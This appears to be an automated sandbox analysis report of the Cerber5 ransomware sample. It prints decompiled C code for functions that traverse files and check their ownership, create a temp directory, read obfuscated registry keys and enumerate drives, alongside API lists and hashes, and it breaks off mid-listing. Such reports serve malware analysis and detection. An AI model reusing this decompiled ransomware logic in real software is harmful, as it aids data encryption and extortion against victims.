CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 0040256C
WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000,000000C8), ref: 00402583
FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,000000C8), ref: 00402595
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,000000C8), ref: 0040259C

Strings

C:\Users\user\AppData\Local\Temp\d06ed635, xrefs: 00402532

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: File$Create$AttributesBuffersCloseDirectoryFlushHandlePathRootSkipWrite
String ID: C:\Users\user\AppData\Local\Temp\d06ed635
API String ID: 1235120676-561343493
Opcode ID: 16bafffdd5c7809d266f610f9f123d127a81daecef8baa3c0d04b187e507f448
Instruction ID: 1381f6fc85793e5c8f5f04911c0c0407d55afb8d8fa61240edf39063a8e535f6
Opcode Fuzzy Hash: 16bafffdd5c7809d266f610f9f123d127a81daecef8baa3c0d04b187e507f448
Instruction Fuzzy Hash: FE01D4B55411187FEB206BA5DD8BEDF3B2CDF04354F100576F901B21D1E6B99E058AAC

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6C5 Relevance: 7.6, APIs: 5, Instructions: 120
stringCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E0040A6C5(void* __ecx, void* __eflags, char* _a4) {
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v23;
				char _v24;
				char _v28;
				void* __esi;
				intOrPtr* _t49;
				intOrPtr* _t50;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr _t54;
				intOrPtr* _t55;
				intOrPtr _t57;
				signed int _t62;
				signed int _t64;
				intOrPtr _t67;
				void* _t70;
				char* _t72;
				void* _t75;
				signed int _t80;
				void* _t83;
				void* _t89;
				void* _t90;

				E00405F6B(__ecx, __eflags,  &_v28);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t72 = _a4;
				_t66 = _t70;
				_v24 =  *_t72;
				CharLowerBuffW( *(_t72 + 8), lstrlenW( *(_t72 + 8)));
				_t75 = E0040A367;
				_t62 = 0;
				E0040A419(_t66, 0,  *(_t72 + 8), E0040A367,  &_v24); // executed
				_t83 = (_t80 & 0xfffffff8) - 0x1c + 0x10;
				if( *_t72 != 0) {
					_t55 =  *0x42fa74; // 0x63d15e0
					_v23 = 1;
					if(_t55 != 0 &&  *_t55 > 0) {
						do {
							_t10 = _t55 + 8; // 0x63cb1f0
							_t66 =  &_v24;
							E0040A419( &_v24, 0,  *((intOrPtr*)( *_t10 + _t62 * 4)), E0040A367,  &_v24);
							_t55 =  *0x42fa74; // 0x63d15e0
							_t83 = _t83 + 0x10;
							_t62 = _t62 + 1;
						} while (_t62 <  *_t55);
					}
					_t64 = 0;
					_t89 =  *0x42fad0 - _t64; // 0x4
					if(_t89 > 0) {
						do {
							_t57 =  *0x42facc; // 0x63c0ad0
							E0040A419(_t66, 0,  *((intOrPtr*)(_t57 + _t64 * 4)), _t75,  &_v24); // executed
							_t83 = _t83 + 0x10;
							_t64 = _t64 + 1;
							_t90 = _t64 -  *0x42fad0; // 0x4
						} while (_t90 < 0);
					}
				}
				if(_v16 == 0) {
					E0040A6AC(_v20);
				} else {
					InterlockedIncrement( *(_t72 + 4));
					 *0x40f1dc( *((intOrPtr*)(_t72 + 0xc)));
					_t67 = _v16;
					if( *_t72 == 0) {
						_t49 =  *((intOrPtr*)(_t72 + 0x18));
						__eflags =  *_t49;
						if( *_t49 == 0) {
							_t50 =  *((intOrPtr*)(_t72 + 0x14));
						} else {
							_t50 =  *_t49;
						}
						 *_t50 = _t67;
						_t67 = _v12;
						_t51 =  *((intOrPtr*)(_t72 + 0x18));
					} else {
						_t51 =  *((intOrPtr*)(_t72 + 0x10));
					}
					 *_t51 = _t67;
					_t52 =  *((intOrPtr*)(_t72 + 0x1c));
					if( *_t52 == 0) {
						 *_t52 = _v24;
					} else {
						_t54 =  *_t52;
						while( *((intOrPtr*)(_t54 + 0xc)) != 0) {
							_t54 =  *((intOrPtr*)(_t54 + 0xc));
						}
						 *((intOrPtr*)(_t54 + 0xc)) = _v24;
					}
					 *0x40f1e4( *((intOrPtr*)(_t72 + 0xc)));
				}
				E00405463( *(_t72 + 8));
				return E00405463(_t72);
			}

0x0040a6d6
0x0040a6e1
0x0040a6e2
0x0040a6e3
0x0040a6e4
0x0040a6e5
0x0040a6e7
0x0040a6e8
0x0040a6ed
0x0040a6f1
0x0040a6ff
0x0040a70a
0x0040a713
0x0040a716
0x0040a71b
0x0040a720
0x0040a722
0x0040a727
0x0040a72e
0x0040a734
0x0040a734
0x0040a737
0x0040a742
0x0040a747
0x0040a74c
0x0040a74f
0x0040a750
0x0040a734
0x0040a754
0x0040a756
0x0040a75c
0x0040a75e
0x0040a763
0x0040a76e
0x0040a773
0x0040a776
0x0040a777
0x0040a777
0x0040a75e
0x0040a75c
0x0040a785
0x0040a7f1
0x0040a787
0x0040a78a
0x0040a793
0x0040a79c
0x0040a7a0
0x0040a7a7
0x0040a7aa
0x0040a7ac
0x0040a7b2
0x0040a7ae
0x0040a7ae
0x0040a7ae
0x0040a7b5
0x0040a7b7
0x0040a7bb
0x0040a7a2
0x0040a7a2
0x0040a7a2
0x0040a7be
0x0040a7c0
0x0040a7c5
0x0040a7e0
0x0040a7c7
0x0040a7c7
0x0040a7ce
0x0040a7cb
0x0040a7cb
0x0040a7d7
0x0040a7d7
0x0040a7e5
0x0040a7e5
0x0040a7f9
0x0040a80b

APIs

Part of subcall function 00405F6B: GetModuleHandleA.KERNEL32(00000000,?,?,00000000,C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe,0040833D,?,?,?,?,?,?,?,00000000), ref: 00405FA1
Part of subcall function 00405F6B: GetProcAddress.KERNEL32(00000000), ref: 00405FA8

lstrlenW.KERNEL32(?), ref: 0040A6F5
CharLowerBuffW.USER32(?,00000000), ref: 0040A6FF

Part of subcall function 0040A419: wsprintfW.USER32 ref: 0040A464
Part of subcall function 0040A419: GetFileAttributesW.KERNEL32(?), ref: 0040A479
Part of subcall function 0040A419: GetFileSecurityW.KERNELBASE(?,00000001,?,00000400,?), ref: 0040A4A4
Part of subcall function 0040A419: GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 0040A4BD
Part of subcall function 0040A419: EqualSid.ADVAPI32(0042FA80,?), ref: 0040A4CF
Part of subcall function 0040A419: GetFileAttributesW.KERNEL32(?), ref: 0040A4E8
Part of subcall function 0040A419: SetFileAttributesW.KERNEL32(?,00000000), ref: 0040A4FB
Part of subcall function 0040A419: lstrcatW.KERNEL32(?,0040CEC8), ref: 0040A50D
Part of subcall function 0040A419: FindFirstFileW.KERNEL32(?,?), ref: 0040A586
Part of subcall function 0040A419: WaitForSingleObject.KERNEL32(00000000), ref: 0040A5A2

InterlockedIncrement.KERNEL32(?), ref: 0040A78A
RtlEnterCriticalSection.NTDLL(?), ref: 0040A793
RtlLeaveCriticalSection.NTDLL(?), ref: 0040A7E5

Part of subcall function 0040A419: GetFileAttributesW.KERNEL32(?,?,0040A367,00000000), ref: 0040A518
Part of subcall function 0040A419: SetFileAttributesW.KERNEL32(?,00000000), ref: 0040A527
Part of subcall function 0040A419: lstrlenW.KERNEL32(?,0040A367), ref: 0040A5DB
Part of subcall function 0040A419: lstrlenW.KERNEL32(?), ref: 0040A602
Part of subcall function 0040A419: CharLowerBuffW.USER32(?,00000000), ref: 0040A610
Part of subcall function 0040A419: Sleep.KERNEL32(00000001), ref: 0040A621
Part of subcall function 0040A419: FindNextFileW.KERNEL32(?,?), ref: 0040A690
Part of subcall function 0040A419: FindClose.KERNEL32(?), ref: 0040A6A1

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: File$Attributes$Findlstrlen$BuffCharCriticalLowerSectionSecurity$AddressCloseDescriptorEnterEqualFirstHandleIncrementInterlockedLeaveModuleNextObjectOwnerProcSingleSleepWaitlstrcatwsprintf
String ID:
API String ID: 2118666660-0
Opcode ID: c2d51708b622c86e144e7ccd5543db7b920f71f6bfb5340e5e32611563adeae3
Instruction ID: 13abfef68b097a612165134c634928f79b1fba2c5b552c62fd9ab30abf4ee98b
Opcode Fuzzy Hash: c2d51708b622c86e144e7ccd5543db7b920f71f6bfb5340e5e32611563adeae3
Instruction Fuzzy Hash: 7F41BC35604301EFC311DF68C884C1ABBB4FB44310B14857AF449AB2A2D334ECA9CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 00406885 Relevance: 7.6, APIs: 5, Instructions: 55
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406885(void* _a4, short* _a8) {
				void* _v8;
				int _v12;
				short _v532;
				short _v1052;
				long _t14;
				long _t19;
				int* _t30;

				_t30 = 0;
				_t14 = RegOpenKeyExW(_a4, _a8, 0, 0x20119,  &_v8); // executed
				if(_t14 == 0) {
					_v12 = 0x208;
					_t19 = RegQueryValueExW(_v8, E0040591C( &E0040D340, 0x10, 0xa58690a2), 0, 0,  &_v532,  &_v12); // executed
					if(_t19 == 0) {
						PathUnquoteSpacesW( &_v532);
						if(ExpandEnvironmentStringsW( &_v532,  &_v1052, 0x104) - 1 <= 0x103) {
							_t30 = E00405933(0,  &_v1052);
						}
					}
					RegCloseKey(_v8);
				}
				return _t30;
			}

0x00406898
0x004068a1
0x004068a9
0x004068c4
0x004068d7
0x004068df
0x004068e8
0x0040690d
0x0040691e
0x0040691e
0x0040690d
0x00406923
0x00406923
0x0040692d

APIs

RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?,00000000), ref: 004068A1
RegQueryValueExW.KERNEL32(?,00000000,00000000,?,?), ref: 004068D7
PathUnquoteSpacesW.SHLWAPI(?), ref: 004068E8
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00406901

Part of subcall function 00405933: lstrlenW.KERNEL32(?,00000000,0040691D,?), ref: 0040593E
Part of subcall function 00405933: memcpy.NTDLL(00000000,?,00000002,00000000,00000000,0040691D,?), ref: 0040595E

RegCloseKey.ADVAPI32(?), ref: 00406923

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: CloseEnvironmentExpandOpenPathQuerySpacesStringsUnquoteValuelstrlenmemcpy
String ID:
API String ID: 2229232589-0
Opcode ID: d5f94109a22552542f79dd981f8c3c2a9d2cfe73a7d1d7489ccac6e0fbc3d8e3
Instruction ID: 1c6706bfa8e7cfeb8a905d666c224299092f6be4206dfad9a6d2e40fcb3e7b74
Opcode Fuzzy Hash: d5f94109a22552542f79dd981f8c3c2a9d2cfe73a7d1d7489ccac6e0fbc3d8e3
Instruction Fuzzy Hash: E91130B2A0011CBBDB20ABA1DC49DDF7B7CEB04350F004475BA15E2590E6749A988FA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405E77 Relevance: 7.5, APIs: 5, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00405E77(intOrPtr _a4, WCHAR* _a8) {
				short _v524;
				short _v1044;
				void* _t12;
				void* _t15;
				void* _t23;
				int _t25;
				void* _t27;

				_t23 = 0;
				_t12 =  *0x40e798(0, 0x28, 0xffffffff, 1,  &_v524); // executed
				if(_t12 == 0) {
					_t15 =  *0x40e798(0, _a4, 0xffffffff, 1,  &_v1044); // executed
					if(_t15 == 0) {
						_t25 = lstrlenW( &_v524);
						if(StrCmpNIW( &_v524,  &_v1044, _t25) == 0) {
							lstrcpyW(_a8, _t27 + _t25 * 2 - 0x40e);
							_t23 = 1;
						}
					}
				}
				return _t23;
			}

0x00405e8e
0x00405e91
0x00405e99
0x00405eaa
0x00405eb2
0x00405ec2
0x00405edb
0x00405ee8
0x00405eee
0x00405eee
0x00405eef
0x00405eb2
0x00405ef4

APIs

SHGetFolderPathW.SHELL32(00000000,00000028,000000FF,00000001,?,00000000), ref: 00405E91
SHGetFolderPathW.SHELL32(00000000,0040A04B,000000FF,00000001,?), ref: 00405EAA
lstrlenW.KERNEL32(?,00000000), ref: 00405EBC
StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00405ED3
lstrcpyW.KERNEL32(00409B15,?), ref: 00405EE8

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: FolderPath$lstrcpylstrlen
String ID:
API String ID: 1609553816-0
Opcode ID: 65910238698a16baef1403d8856055784a34b947144a8e198e14723933732cae
Instruction ID: de2901f31616993a4ae986fc8dc4909f55669c9a08417f91c19eeb543ab8afdd
Opcode Fuzzy Hash: 65910238698a16baef1403d8856055784a34b947144a8e198e14723933732cae
Instruction Fuzzy Hash: 670144765001187BEB209B55DC48FEB37ACEB45714F404671FA26F21D0EA70DA958B58

Uniqueness

Uniqueness Score: -1.00%

Function 00404CDC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404CDC() {
				signed int _t3;
				long _t5;
				int _t7;
				signed short _t8;
				WCHAR* _t10;
				short _t11;
				int _t18;

				_t11 = 0;
				_t10 = PathSkipRootW(0x42fbc8);
				if(_t10 == 0) {
					_t10 = 0x42fbc8;
				}
				while(1) {
					_t3 =  *_t10 & 0x0000ffff;
					if(_t3 == 0x5c || _t3 == 0x2f || _t3 == 0) {
						goto L5;
					}
					L11:
					_t10 =  &(_t10[1]);
					continue;
					L5:
					_t8 = _t3;
					 *_t10 = 0; // executed
					_t5 = GetFileAttributesW(0x42fbc8); // executed
					if(_t5 == 0xffffffff) {
						_t7 = CreateDirectoryW(0x42fbc8, 0); // executed
						_t18 = _t7;
					}
					if(_t18 == 0) {
						L13:
						return _t11;
					} else {
						if(_t8 == 0) {
							_t11 = 1;
							goto L13;
						}
						 *_t10 = _t8;
						goto L11;
					}
				}
			}

0x00404ce6
0x00404cee
0x00404cf2
0x00404cf4
0x00404cf4
0x00404cf6
0x00404cf6
0x00404cfc
0x00000000
0x00000000
0x00404d34
0x00404d34
0x00000000
0x00404d08
0x00404d08
0x00404d0d
0x00404d10
0x00404d19
0x00404d1e
0x00404d24
0x00404d24
0x00404d2a
0x00404d3e
0x00404d42
0x00404d2c
0x00404d2f
0x00404d3b
0x00000000
0x00404d3b
0x00404d31
0x00000000
0x00404d31
0x00404d2a

APIs

PathSkipRootW.SHLWAPI(C:\Users\user\AppData\Local\Temp\d06ed635,?,00000000,?,00000000,0040252D,00000000,?,?,?,004025E2,68f6,00000000,004026EC,004065F6,00000000), ref: 00404CE8
GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\d06ed635,?,00000000,0040252D,00000000,?,?,?,004025E2,68f6,00000000,004026EC,004065F6,00000000,00000001,00000000), ref: 00404D10
CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\d06ed635,00000000,?,00000000,0040252D,00000000,?,?,?,004025E2,68f6,00000000,004026EC,004065F6,00000000,00000001), ref: 00404D1E

Strings

C:\Users\user\AppData\Local\Temp\d06ed635, xrefs: 00404CE0, 00404CE5, 00404D0C, 00404D1D

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: AttributesCreateDirectoryFilePathRootSkip
String ID: C:\Users\user\AppData\Local\Temp\d06ed635
API String ID: 4231520044-561343493
Opcode ID: 1bfba49f01c74f403b024d25f715790fdd7751a1fbd84344ea4d52c588a6695e
Instruction ID: b5ef174f6fe4e018175640b39cc43a5cbe7dec1c5a9dae98cbdd48c22ee4a358
Opcode Fuzzy Hash: 1bfba49f01c74f403b024d25f715790fdd7751a1fbd84344ea4d52c588a6695e
Instruction Fuzzy Hash: 49F028A53012155BD7301AA96D0463776A8CFE27627210A7BFE91F22D0E63C8C026128

Uniqueness

Uniqueness Score: -1.00%

Function 0040692E Relevance: 6.1, APIs: 4, Instructions: 80
registryCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040692E(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				char _v5;
				int _v12;
				void* _v16;
				short* _v20;
				void* __esi;
				long _t22;
				long _t27;
				void* _t29;
				void* _t33;
				short* _t39;
				void* _t44;

				_t33 = __ecx;
				_t22 = RegOpenKeyExW(0x80000002, E0040591C(0x40d3ec, 0x38, 0xa9ebca9c), 0, 0x20119,  &_v16); // executed
				if(_t22 == 0) {
					if(RegQueryInfoKeyW(_v16, 0, 0, 0, 0,  &_v12, 0, 0, 0, 0, 0, 0) != 0) {
						L12:
						return RegCloseKey(_v16);
					}
					_v12 = _v12 + 1;
					_t39 = E004053BD(_t33);
					if(_t39 == 0) {
						L11:
						goto L12;
					}
					_v5 = 0;
					_v20 = 0;
					do {
						_t27 = RegEnumKeyW(_v16, _v20, _t39, _v12); // executed
						if(_t27 != 0) {
							break;
						}
						_t29 = E00406885(_v16, _t39); // executed
						_t44 = _t29;
						if(_t44 != 0) {
							_push(_a8);
							_push(_t44);
							if(_a4() != 0) {
								_v5 = 1;
							}
							E00405463(_t44);
						}
						_v20 = _v20 + 1;
					} while (_v5 == 0);
					E00405463(_t39);
					goto L11;
				}
				return _t22;
			}

0x0040692e
0x0040695b
0x00406963
0x00406982
0x004069e9
0x00000000
0x004069ec
0x00406984
0x00406992
0x00406996
0x004069e8
0x00000000
0x004069e8
0x00406998
0x0040699b
0x0040699f
0x004069a9
0x004069b1
0x00000000
0x00000000
0x004069b7
0x004069bc
0x004069c2
0x004069c4
0x004069c7
0x004069cd
0x004069cf
0x004069cf
0x004069d3
0x004069d3
0x004069d8
0x004069db
0x004069e2
0x00000000
0x004069e7
0x004069f4

APIs

RegOpenKeyExW.KERNEL32(80000002,00000000,00020119,00000000,00000000,00409B30,00000000,?,00000000), ref: 0040695B
RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 0040697A
RegEnumKeyW.ADVAPI32(00000000,00000000,00000000,00000000), ref: 004069A9

Part of subcall function 00406885: RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?,00000000), ref: 004068A1
Part of subcall function 00406885: RegQueryValueExW.KERNEL32(?,00000000,00000000,?,?), ref: 004068D7
Part of subcall function 00406885: PathUnquoteSpacesW.SHLWAPI(?), ref: 004068E8
Part of subcall function 00406885: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00406901
Part of subcall function 00406885: RegCloseKey.ADVAPI32(?), ref: 00406923

RegCloseKey.ADVAPI32(?,?,00000000), ref: 004069EC

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: CloseOpenQuery$EnumEnvironmentExpandInfoPathSpacesStringsUnquoteValue
String ID:
API String ID: 3336427869-0
Opcode ID: d4b18ec246cc545aebc2d9454a4f6d9b65cb319625587ec5a47d917e64776c67
Instruction ID: 853463cecd8b6028bb46b6cb4b877976a71b5afdd9393abb8aaabce99423f380
Opcode Fuzzy Hash: d4b18ec246cc545aebc2d9454a4f6d9b65cb319625587ec5a47d917e64776c67
Instruction Fuzzy Hash: 75210272900118BFEB116BE49C85EEFBB7CEF00344F14407AF902B2181D7754E258B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040B08E Relevance: 6.1, APIs: 4, Instructions: 61
registryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040B08E(intOrPtr* __eax, void* __ecx, short* _a4, short* _a8) {
				int _v8;
				void* _v12;
				void* __esi;
				long _t15;
				long _t18;
				long _t22;
				char* _t30;
				intOrPtr* _t34;

				_t28 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t34 = __eax;
				_t30 = 0;
				_t15 = RegOpenKeyExW(0x80000002, _a4, 0, 0x20119,  &_v12); // executed
				if(_t15 != 0) {
					L8:
					return _t30;
				} else {
					_v8 = 0;
					_t18 = RegQueryValueExW(_v12, _a8, 0, 0, 0,  &_v8); // executed
					if(_t18 == 0) {
						_t30 = E004053BD(_t28);
						if(_t30 != 0) {
							_t22 = RegQueryValueExW(_v12, _a8, 0, 0, _t30,  &_v8); // executed
							if(_t22 == 0) {
								if(_t34 != 0) {
									 *_t34 = _v8;
								}
							} else {
								E00405463(_t30);
								_t30 = 0;
							}
						}
					}
					RegCloseKey(_v12);
					goto L8;
				}
			}

0x0040b08e
0x0040b091
0x0040b092
0x0040b096
0x0040b0a7
0x0040b0ae
0x0040b0b6
0x0040b114
0x0040b11a
0x0040b0b8
0x0040b0c2
0x0040b0c8
0x0040b0d0
0x0040b0da
0x0040b0de
0x0040b0ed
0x0040b0f5
0x0040b104
0x0040b109
0x0040b109
0x0040b0f7
0x0040b0f9
0x0040b0fe
0x0040b0fe
0x0040b0f5
0x0040b0de
0x0040b10e
0x00000000
0x0040b10e

APIs

RegOpenKeyExW.KERNEL32(80000002,0040B57E,00000000,00020119,0040B57E,00000000,00000000,?,?,?,?,0040B57E,00000000,?,?,00000000), ref: 0040B0AE
RegQueryValueExW.KERNEL32(0040B57E,?,00000000,00000000,00000000,00000000,?,?,?,?,0040B57E,00000000,?,?,00000000), ref: 0040B0C8
RegQueryValueExW.KERNEL32(0040B57E,?,00000000,00000000,00000000,00000000,?,?,?,?,0040B57E,00000000,?,?,00000000), ref: 0040B0ED

Part of subcall function 00405463: GetLastError.KERNEL32(00000000,00405722), ref: 0040546D
Part of subcall function 00405463: RtlFreeHeap.NTDLL(00000000,-00000008), ref: 0040549A
Part of subcall function 00405463: SetLastError.KERNEL32(00000000), ref: 004054A1

RegCloseKey.ADVAPI32(0040B57E,?,?,?,?,0040B57E,00000000,?,?,00000000,?,?,00000000), ref: 0040B10E

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: ErrorLastQueryValue$CloseFreeHeapOpen
String ID:
API String ID: 3207664046-0
Opcode ID: 16f9e4b66221e959ca600fa4562156c731eca4efc3bea92618bec30b8f58fea7
Instruction ID: d330e1e9e1ceab0afd93f14912bc7271c4ca599fa294788e7f532a214b6da2e9
Opcode Fuzzy Hash: 16f9e4b66221e959ca600fa4562156c731eca4efc3bea92618bec30b8f58fea7
Instruction Fuzzy Hash: 62115E72600518BFEB105FA1CC85DBFBBBDEB843D4B14007AF915E6250E7708E059BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A0A4 Relevance: 6.1, APIs: 4, Instructions: 61
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A0A4() {
				char _v8;
				void* _v12;
				int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long _t17;
				short* _t19;
				long _t20;
				short* _t26;
				long _t27;
				signed int _t30;
				signed int _t31;
				void* _t32;
				void* _t33;

				_t17 = GetLogicalDrives(); // executed
				_t30 = 0;
				_v20 = _t17;
				_v28 = 0x80000002;
				_v24 = 0x80000001;
				_t31 = 0;
				do {
					_t19 = E0040591C(0x40d860, 0x3b, 0xf6d84de6);
					_t33 = _t33 + 0xc;
					_t20 = RegOpenKeyExW( *(_t32 + _t31 * 4 - 0x18), _t19, 0, 0x20019,  &_v12); // executed
					if(_t20 == 0) {
						_v8 = 0;
						_v16 = 4;
						_t26 = E0040591C(0x40d89c, 8, 0x19e52868);
						_t33 = _t33 + 0xc;
						_t27 = RegQueryValueExW(_v12, _t26, 0, 0,  &_v8,  &_v16); // executed
						if(_t27 == 0 && _v8 != 0) {
							_t30 = _t30 | _v8;
						}
						RegCloseKey(_v12); // executed
					}
					_t31 = _t31 + 1;
				} while (_t31 < 2);
				return  !_t30 & _v20;
			}

0x0040a0ad
0x0040a0b5
0x0040a0b7
0x0040a0ba
0x0040a0c1
0x0040a0c8
0x0040a0ca
0x0040a0e0
0x0040a0e5
0x0040a0ed
0x0040a0f5
0x0040a10d
0x0040a110
0x0040a117
0x0040a11c
0x0040a123
0x0040a12b
0x0040a132
0x0040a132
0x0040a138
0x0040a138
0x0040a13e
0x0040a13f
0x0040a14f

APIs

GetLogicalDrives.KERNEL32 ref: 0040A0AD
RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,00000000), ref: 0040A0ED
RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040A123
RegCloseKey.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040A138

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: CloseDrivesLogicalOpenQueryValue
String ID:
API String ID: 2666887985-0
Opcode ID: 98d578a29b34be7c7f14f1d4082e872bc01e994f5f5c88348c940d1bfaa40c78
Instruction ID: 31f235d855805f4f5877ecc24470a71aed6712d684aed6bf08466ec839675859
Opcode Fuzzy Hash: 98d578a29b34be7c7f14f1d4082e872bc01e994f5f5c88348c940d1bfaa40c78
Instruction Fuzzy Hash: 1E119EB2E40218BFEB10AFE19C85EAFBBBDEB44344F104076E914F2181D7745A198B99

Uniqueness

Uniqueness Score: -1.00%

Function 004053CA Relevance: 6.1, APIs: 4, Instructions: 60
memoryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004053CA(void* __eax, void* __ecx, void* __edi) {
				long _v8;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t12;
				void* _t17;
				void* _t20;
				void* _t27;
				void* _t29;
				void* _t32;

				_t27 = __edi;
				_t22 = __ecx;
				_push(__ecx);
				_t29 = __eax;
				_v8 = GetLastError();
				if(E0040521D() == 0) {
					E004052DB(_t22);
				}
				_t20 = 0;
				if(_t29 == 0) {
					L12:
					SetLastError(_v8);
					return _t20;
				} else {
					_t32 = E004051F5(_t22, _t29 + 2);
					_t35 = _t27;
					if(_t27 == 0) {
						L9:
						_t4 = _t32 + 0xc; // 0xc
						_t12 = RtlAllocateHeap( *0x42f808, 8, _t4); // executed
						L10:
						__eflags = _t12;
						if(_t12 != 0) {
							_t20 = E00405329(_t12, _t32);
						}
						goto L12;
					}
					_push(_t27);
					if(E0040522F(0, _t32, _t35) == 0) {
						goto L12;
					}
					if(_t32 > E004053C6(_t27)) {
						_t17 = _t27 - 8;
						__eflags = _t17;
						if(_t17 == 0) {
							goto L9;
						}
						_t3 = _t32 + 0xc; // 0xc
						_t12 = RtlReAllocateHeap( *0x42f808, 8, _t17, _t3);
						goto L10;
					}
					_t20 = _t27;
					goto L12;
				}
			}

0x004053ca
0x004053ca
0x004053cd
0x004053d0
0x004053d8
0x004053e2
0x004053e4
0x004053e4
0x004053e9
0x004053ed
0x00405454
0x00405457
0x00405462
0x004053ef
0x004053f9
0x004053fb
0x004053fd
0x00405435
0x00405435
0x00405441
0x00405447
0x00405447
0x00405449
0x00405452
0x00405452
0x00000000
